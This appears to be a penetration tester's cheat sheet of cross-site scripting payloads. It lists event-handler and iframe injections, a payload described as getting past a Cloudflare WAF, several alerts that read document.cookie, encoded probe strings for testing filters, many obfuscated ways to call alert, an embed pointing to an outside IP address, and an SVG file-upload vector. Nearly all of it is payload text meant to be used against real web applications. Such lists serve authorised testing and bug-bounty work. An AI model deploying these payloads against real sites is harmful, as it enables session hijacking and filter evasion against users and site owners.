# I think maybe need https://domain
<embed src=//165.232.154.124>
<base src=//14.rs/#alert('XSSTEST')>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%20%41%74%74%61%63%6b%21%27%29%3c%2f%73%63%72%69%70%74%3E"></iframe>
<iframe src="javascript:alert(1)"></iframe>



<svg/onload=confirm(1)>
# blacklisted(almost) (Intruder -> know which is possible -> custom tag)
<audio onplay=alert(1) autoplay>
<details ontoggle= open>test</detail>
<custom id=x onfocus=alert(document.cookie) tabindex=1>
# whitelisted
# bypass WAF (cloudflare)
<Img/Src/OnError=(alert)(1)>

# low impact
<a/href="j&#97v&#97script&#x3A;&#97lert(document.cookie)">ClickMe


# check alternative is possible
<"'>\u003C\u0022\u0027\u003E%3C%22%27%3E&lt;&quot;&#39;&gt;&#x3c;&#x22;&#x27;&#x3e;&#60;&#34;&#39;&#62;

<"'>
\u003C\u0022\u0027\u003E
%3C%22%27%3E
&lt;&quot;&#39;&gt;
&#x3c;&#x22;&#x27;&#x3e;
&#60;&#34;&#39;&#62;




# bypass ways
window.alert()
window['alert']()
alert()
alert``
onload=alert
\u0061lert()
globalThis.alert()
window?.alert()
eval?.('ale'+'rt('+')')
[1].find(alert)

好=alert,好()
var x=x||alert;x()
alert(1),ErrExit
[][0]??alert()
null??alert()
undefined??alert()
x??alert();var x;

# svg fileupload -> XSS
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"></svg>
